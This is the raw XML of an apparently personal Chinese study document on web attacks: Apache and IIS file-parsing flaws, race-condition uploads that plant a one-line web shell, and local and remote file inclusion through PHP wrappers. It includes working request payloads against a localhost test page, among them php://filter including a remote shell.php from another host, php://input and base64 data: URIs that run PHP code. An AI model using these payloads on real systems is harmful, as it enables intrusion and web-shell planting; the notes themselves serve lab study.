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apache解析漏洞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802765"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="3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083945"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13335"/>
            <wp:docPr id="2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iis解析漏洞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类型1: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一个是如果目录名以".asp 、.asa、.cer、.cdx "字符串结尾，那么这个目录下所有的文件都会按照 asp格式 去解析。eg: “test.asp/1.jpg”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181735"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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928370"/>
            <wp:effectExtent l="0" t="0" r="1905" b="127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类型2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">文件名中含有".asp;、.asa;、.cer;、.cdx;会优先按 asp 来解析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eg： “1.asp;.jpg”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212975"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1206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15840" cy="10668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文件竞争上传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上传文件内容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783590"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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对上传文件添加字典 控制发包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046480"/>
            <wp:effectExtent l="0" t="0" r="14605" b="508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451610"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1143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162050"/>
            <wp:effectExtent l="0" t="0" r="635" b="1143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并发访问上传的页面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289050"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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508125"/>
            <wp:effectExtent l="0" t="0" r="14605" b="63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447800"/>
            <wp:effectExtent l="0" t="0" r="635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开始上传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207135"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1206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成功访问到，并生成一句话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114425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13335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37005"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1079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224405"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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本地文件包含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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:52.95pt;width:75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Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1468075725" r:id="rId21">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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956945"/>
            <wp:effectExtent l="0" t="0" r="6985" b="317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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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远程文件包含</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:object>
          <v:shape id="_x0000_i1026" o:spt="75" type="#_x0000_t75" style="height:52.95pt;width:75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Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1468075726" r:id="rId24">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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16990"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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  <w:r>
        <w:object>
          <v:shape id="_x0000_i1027" o:spt="75" type="#_x0000_t75" style="height:52.95pt;width:75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Package" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1468075727" r:id="rId27">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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956945"/>
            <wp:effectExtent l="0" t="0" r="6985" b="317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需要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php.ini 中的配置选项                 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allow_url_fopen=On                       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allow_url_include=On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159510"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"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83030"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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使用php://filter进行文件包含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http://localhost/diy/fileinclude/includeTest.php?page=php://filter/read=convert.base64-encode/resource=http://192.168.1.12:8095/shell.php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492125"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="2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Base64解码即可获得伪协议包含到的数据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686560"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:docPr id="2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使用php://input进行文件包含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需要开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>allow_url_include=on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，对allow_url_fopen不做要求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php://input 放在get请求参数后面  具体的执行代码放在post请求体中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100455"/>
            <wp:effectExtent l="0" t="0" r="3175" b="12065"/>
            <wp:docPr id="2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GET /diy/fileinclude/includeTest.php?page=php://input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HTTP/1.1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  <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;?php phpinfo();?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/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1054100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
            <wp:docPr id="2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使用data:text/plain进行文件包含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用法1：?file=data:text/plain;base64,编码后的php代码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/diy/fileinclude/includeTest.php?page=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== HTTP/1.1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73040" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2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用法2：?file=data:text/plain,&lt;?php 执行内容 ?&gt;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22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/diy/fileinclude/includeTest.php?page=data:text/plain,&lt;?php%20phpinfo();?&gt; HTTP/1.1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883920"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="2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使用zip进行文件包含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需要注意的是，压缩为zip之后，后缀名称可以更改为jpg等其他后缀,因为只要是用zip协议压缩的就行，和文件后缀没有关系 </w:t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没有更改文件后缀的情况下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71550"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810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将图片马压缩，再将图片马改后缀为jpg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82040"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2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EB"/>
    <w:rsid w:val="0023594A"/>
    <w:rsid w:val="008A6462"/>
    <w:rsid w:val="00A20B37"/>
    <w:rsid w:val="00B41C64"/>
    <w:rsid w:val="00C64FEB"/>
    <w:rsid w:val="00DF3B66"/>
    <w:rsid w:val="00FF4F1D"/>
    <w:rsid w:val="01942C95"/>
    <w:rsid w:val="01CC750F"/>
    <w:rsid w:val="0357140C"/>
    <w:rsid w:val="035D7BB2"/>
    <w:rsid w:val="038150C4"/>
    <w:rsid w:val="03D254F5"/>
    <w:rsid w:val="04422A06"/>
    <w:rsid w:val="051F61C9"/>
    <w:rsid w:val="0550661E"/>
    <w:rsid w:val="06074A92"/>
    <w:rsid w:val="06662F1C"/>
    <w:rsid w:val="069904AF"/>
    <w:rsid w:val="069C53DC"/>
    <w:rsid w:val="074049C5"/>
    <w:rsid w:val="078576A3"/>
    <w:rsid w:val="079F2A75"/>
    <w:rsid w:val="07C63938"/>
    <w:rsid w:val="085634AA"/>
    <w:rsid w:val="090D113B"/>
    <w:rsid w:val="09451196"/>
    <w:rsid w:val="096A430A"/>
    <w:rsid w:val="09DE3E5B"/>
    <w:rsid w:val="0A163487"/>
    <w:rsid w:val="0A7E15D7"/>
    <w:rsid w:val="0AD77CF7"/>
    <w:rsid w:val="0B5C04F9"/>
    <w:rsid w:val="0C006DEC"/>
    <w:rsid w:val="0C6B46E8"/>
    <w:rsid w:val="0CAE2E64"/>
    <w:rsid w:val="0D943474"/>
    <w:rsid w:val="0E055033"/>
    <w:rsid w:val="0F1364C0"/>
    <w:rsid w:val="0FB63BCD"/>
    <w:rsid w:val="10380421"/>
    <w:rsid w:val="10B468C7"/>
    <w:rsid w:val="114A062A"/>
    <w:rsid w:val="117F0303"/>
    <w:rsid w:val="11D4637C"/>
    <w:rsid w:val="12002964"/>
    <w:rsid w:val="12074EF2"/>
    <w:rsid w:val="120A2190"/>
    <w:rsid w:val="138D0927"/>
    <w:rsid w:val="13AE2AFA"/>
    <w:rsid w:val="146613A2"/>
    <w:rsid w:val="147D2E57"/>
    <w:rsid w:val="14AC3D69"/>
    <w:rsid w:val="15780172"/>
    <w:rsid w:val="18507ADA"/>
    <w:rsid w:val="18720907"/>
    <w:rsid w:val="19C445DF"/>
    <w:rsid w:val="1AE71B0C"/>
    <w:rsid w:val="1B0B331B"/>
    <w:rsid w:val="1B2F34BE"/>
    <w:rsid w:val="1B636902"/>
    <w:rsid w:val="1D403FAF"/>
    <w:rsid w:val="1E2C5803"/>
    <w:rsid w:val="1E3662B2"/>
    <w:rsid w:val="1F2C6D4A"/>
    <w:rsid w:val="20605240"/>
    <w:rsid w:val="207B5B82"/>
    <w:rsid w:val="20FD0048"/>
    <w:rsid w:val="213C0B23"/>
    <w:rsid w:val="216145F7"/>
    <w:rsid w:val="21DB10AF"/>
    <w:rsid w:val="21DD41A7"/>
    <w:rsid w:val="21E97C41"/>
    <w:rsid w:val="21FA7B94"/>
    <w:rsid w:val="22F45583"/>
    <w:rsid w:val="23A3444E"/>
    <w:rsid w:val="23E71E52"/>
    <w:rsid w:val="24B27E30"/>
    <w:rsid w:val="250A43E5"/>
    <w:rsid w:val="25705D6F"/>
    <w:rsid w:val="265571A6"/>
    <w:rsid w:val="26CE201B"/>
    <w:rsid w:val="273D2A06"/>
    <w:rsid w:val="29297999"/>
    <w:rsid w:val="29733134"/>
    <w:rsid w:val="29C36ABA"/>
    <w:rsid w:val="2A787AA4"/>
    <w:rsid w:val="2AAD18D2"/>
    <w:rsid w:val="2B5A1BD6"/>
    <w:rsid w:val="2B990470"/>
    <w:rsid w:val="2D0A6836"/>
    <w:rsid w:val="2E566C1A"/>
    <w:rsid w:val="2E5D4484"/>
    <w:rsid w:val="2EA95A80"/>
    <w:rsid w:val="2F0576C1"/>
    <w:rsid w:val="30187E3D"/>
    <w:rsid w:val="3021156E"/>
    <w:rsid w:val="3080293B"/>
    <w:rsid w:val="30DA679E"/>
    <w:rsid w:val="312B10B2"/>
    <w:rsid w:val="31D63FFE"/>
    <w:rsid w:val="31DC40CF"/>
    <w:rsid w:val="31EC09DC"/>
    <w:rsid w:val="328B6209"/>
    <w:rsid w:val="333D5FDF"/>
    <w:rsid w:val="338D76E1"/>
    <w:rsid w:val="33A16571"/>
    <w:rsid w:val="33DD0BFA"/>
    <w:rsid w:val="34390711"/>
    <w:rsid w:val="34647808"/>
    <w:rsid w:val="34B83A62"/>
    <w:rsid w:val="35101C47"/>
    <w:rsid w:val="35391C5B"/>
    <w:rsid w:val="355B0CFF"/>
    <w:rsid w:val="35753C2F"/>
    <w:rsid w:val="36326100"/>
    <w:rsid w:val="365B725A"/>
    <w:rsid w:val="36955B28"/>
    <w:rsid w:val="369F6178"/>
    <w:rsid w:val="370F4B8D"/>
    <w:rsid w:val="37214622"/>
    <w:rsid w:val="37B74CEB"/>
    <w:rsid w:val="37CD1E50"/>
    <w:rsid w:val="387D487D"/>
    <w:rsid w:val="392C1253"/>
    <w:rsid w:val="39514644"/>
    <w:rsid w:val="39F4642D"/>
    <w:rsid w:val="3A6B0DBE"/>
    <w:rsid w:val="3B5C0D47"/>
    <w:rsid w:val="3C1703D7"/>
    <w:rsid w:val="3C8C54B3"/>
    <w:rsid w:val="3DED3435"/>
    <w:rsid w:val="3E3C1282"/>
    <w:rsid w:val="3E756395"/>
    <w:rsid w:val="3EB566B8"/>
    <w:rsid w:val="3EF53EFC"/>
    <w:rsid w:val="3F5D1C64"/>
    <w:rsid w:val="3F8C3184"/>
    <w:rsid w:val="3FE768C8"/>
    <w:rsid w:val="400E5F34"/>
    <w:rsid w:val="40BA628E"/>
    <w:rsid w:val="40BC2CD2"/>
    <w:rsid w:val="4120314F"/>
    <w:rsid w:val="41334145"/>
    <w:rsid w:val="416E3809"/>
    <w:rsid w:val="41841CA1"/>
    <w:rsid w:val="430E3DDE"/>
    <w:rsid w:val="43445545"/>
    <w:rsid w:val="43C905C5"/>
    <w:rsid w:val="441470A0"/>
    <w:rsid w:val="443703BA"/>
    <w:rsid w:val="449D4374"/>
    <w:rsid w:val="4581153F"/>
    <w:rsid w:val="459B1F0D"/>
    <w:rsid w:val="45D852C8"/>
    <w:rsid w:val="461C0F3D"/>
    <w:rsid w:val="463E1E51"/>
    <w:rsid w:val="465B5C8D"/>
    <w:rsid w:val="467C0509"/>
    <w:rsid w:val="49721650"/>
    <w:rsid w:val="49E315D4"/>
    <w:rsid w:val="49F94225"/>
    <w:rsid w:val="4AD34AE6"/>
    <w:rsid w:val="4B55775C"/>
    <w:rsid w:val="4B7F0662"/>
    <w:rsid w:val="4C3C512A"/>
    <w:rsid w:val="4D7E37C7"/>
    <w:rsid w:val="4DB80045"/>
    <w:rsid w:val="4DC3562A"/>
    <w:rsid w:val="4E1C24C0"/>
    <w:rsid w:val="4E577E0D"/>
    <w:rsid w:val="4E5C4959"/>
    <w:rsid w:val="4EEE422C"/>
    <w:rsid w:val="5103038C"/>
    <w:rsid w:val="51AD2F1B"/>
    <w:rsid w:val="51FA4D55"/>
    <w:rsid w:val="526901EE"/>
    <w:rsid w:val="53691BB3"/>
    <w:rsid w:val="53C24891"/>
    <w:rsid w:val="53FD6291"/>
    <w:rsid w:val="54280C29"/>
    <w:rsid w:val="5474410F"/>
    <w:rsid w:val="55455711"/>
    <w:rsid w:val="556751A8"/>
    <w:rsid w:val="55812EC4"/>
    <w:rsid w:val="55E83793"/>
    <w:rsid w:val="560369AB"/>
    <w:rsid w:val="569F244D"/>
    <w:rsid w:val="577D4CC1"/>
    <w:rsid w:val="5A0D3687"/>
    <w:rsid w:val="5A4A38E7"/>
    <w:rsid w:val="5A713DED"/>
    <w:rsid w:val="5AD942F8"/>
    <w:rsid w:val="5AE728F6"/>
    <w:rsid w:val="5C517FBA"/>
    <w:rsid w:val="5DAA621C"/>
    <w:rsid w:val="5E2A7475"/>
    <w:rsid w:val="5E8254BA"/>
    <w:rsid w:val="5EA83DD9"/>
    <w:rsid w:val="5ED867D3"/>
    <w:rsid w:val="5F8E6FCE"/>
    <w:rsid w:val="5FF11628"/>
    <w:rsid w:val="60354875"/>
    <w:rsid w:val="61A717D8"/>
    <w:rsid w:val="61C81796"/>
    <w:rsid w:val="61CD71CD"/>
    <w:rsid w:val="62166A89"/>
    <w:rsid w:val="629D3956"/>
    <w:rsid w:val="6396538C"/>
    <w:rsid w:val="63B006E1"/>
    <w:rsid w:val="63C97C19"/>
    <w:rsid w:val="647332DF"/>
    <w:rsid w:val="64D6391F"/>
    <w:rsid w:val="65423F1A"/>
    <w:rsid w:val="66667E07"/>
    <w:rsid w:val="67213E4F"/>
    <w:rsid w:val="679C75CE"/>
    <w:rsid w:val="67AF111C"/>
    <w:rsid w:val="67D803D2"/>
    <w:rsid w:val="67DB5C8E"/>
    <w:rsid w:val="68D54612"/>
    <w:rsid w:val="6A4952C9"/>
    <w:rsid w:val="6AD71F1F"/>
    <w:rsid w:val="6D4C1A9E"/>
    <w:rsid w:val="6DF91553"/>
    <w:rsid w:val="6E316129"/>
    <w:rsid w:val="6FEB76FD"/>
    <w:rsid w:val="6FF17FA7"/>
    <w:rsid w:val="6FF9791C"/>
    <w:rsid w:val="70095553"/>
    <w:rsid w:val="70DE10BF"/>
    <w:rsid w:val="715724A5"/>
    <w:rsid w:val="715A2016"/>
    <w:rsid w:val="718D5A15"/>
    <w:rsid w:val="72507AA4"/>
    <w:rsid w:val="7259385A"/>
    <w:rsid w:val="729F30AA"/>
    <w:rsid w:val="736860E4"/>
    <w:rsid w:val="73B92B14"/>
    <w:rsid w:val="73D8001F"/>
    <w:rsid w:val="741C1DEE"/>
    <w:rsid w:val="7452359D"/>
    <w:rsid w:val="74636A51"/>
    <w:rsid w:val="74B768BE"/>
    <w:rsid w:val="74BF3107"/>
    <w:rsid w:val="74F10F08"/>
    <w:rsid w:val="75164D0B"/>
    <w:rsid w:val="75291E59"/>
    <w:rsid w:val="757B24C1"/>
    <w:rsid w:val="75AE1C04"/>
    <w:rsid w:val="766D7391"/>
    <w:rsid w:val="7672045F"/>
    <w:rsid w:val="77742390"/>
    <w:rsid w:val="77965B8C"/>
    <w:rsid w:val="77B83ECD"/>
    <w:rsid w:val="77F67EE7"/>
    <w:rsid w:val="78692095"/>
    <w:rsid w:val="78AE1860"/>
    <w:rsid w:val="7A7110D3"/>
    <w:rsid w:val="7AB65345"/>
    <w:rsid w:val="7B8E1124"/>
    <w:rsid w:val="7BE0235E"/>
    <w:rsid w:val="7C0F5196"/>
    <w:rsid w:val="7C36387C"/>
    <w:rsid w:val="7C9066E2"/>
    <w:rsid w:val="7D4A69DB"/>
    <w:rsid w:val="7DE4576E"/>
    <w:rsid w:val="7ED54E59"/>
    <w:rsid w:val="7EF71406"/>
    <w:rsid w:val="7F1A6C2C"/>
    <w:rsid w:val="7F9F6DE9"/>
    <w:rsid w:val="7FC85986"/>
    <w:rsid w:val="7FE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oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin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135</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>73</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>157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2020-08-19T11:05:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-03T14:13:26Z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